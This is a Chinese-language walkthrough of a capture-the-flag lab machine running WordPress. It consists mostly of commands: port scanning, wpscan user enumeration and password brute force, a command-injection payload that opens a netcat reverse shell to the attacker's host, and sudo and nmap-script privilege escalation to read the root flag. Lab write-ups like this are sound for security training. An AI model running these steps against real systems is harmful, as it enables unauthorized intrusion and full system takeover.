ip 扫描发现主机 192.168.163.133
namp -T4 -A -p- 192.168.163.133 扫描端口发现 80 和 22 端口
访问网站被重定向 http://wordy/ , 修改 hosts 文件
发现站点为 wordpress,使用 whatweb 查看详细信息,dirsearch 扫描目录
1
2
whatweb -v http://wordy/
dirsearch -u http://wordy/
登陆页面: http://wordy/wp-login.php
wpscan 获取用户名
1
2
3
wpscan --url http://wordy/ -e u
# 保存用户名
echo "admin\ngraham\nmark\nsarah\njens" >user.txt
根据官网提示生成密码字典
1
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
wpscan 进行爆破
1
2
wpscan --url http://wordy -U user.txt -P passwords.txt
# mark helpdesk01
登录成功找到页面,发现存在远程命令执行漏洞
反弹 shell
1
2
3
127.0.0.1;nc -nv 192.168.163.132 4444 -e /bin/bash
# kali
nc -lvvp 4444
查看 home 目录
1
ls -R /home
查看 things-to-do.txt 文件,获取用户名密码 graham GSo7isUM1D4
切换用户后,sudo -l 尝试提权
在 backups.sh 脚本中写入 /bin/bash进行提权
1
2
echo '/bin/bash' >> /home/jens/backups.sh
sudo -u jens /home/jens/backups.sh
切换用户成功,进一步提权
namp 提权
1
2
3
tf=$(mktemp)
echo 'os.execute("/bin/sh")' > $tf
sudo nmap --script=$tf
提权成功
1
2
3
python -c 'import pty;pty.spawn("/bin/bash")'
cd /root
cat theflag.txt
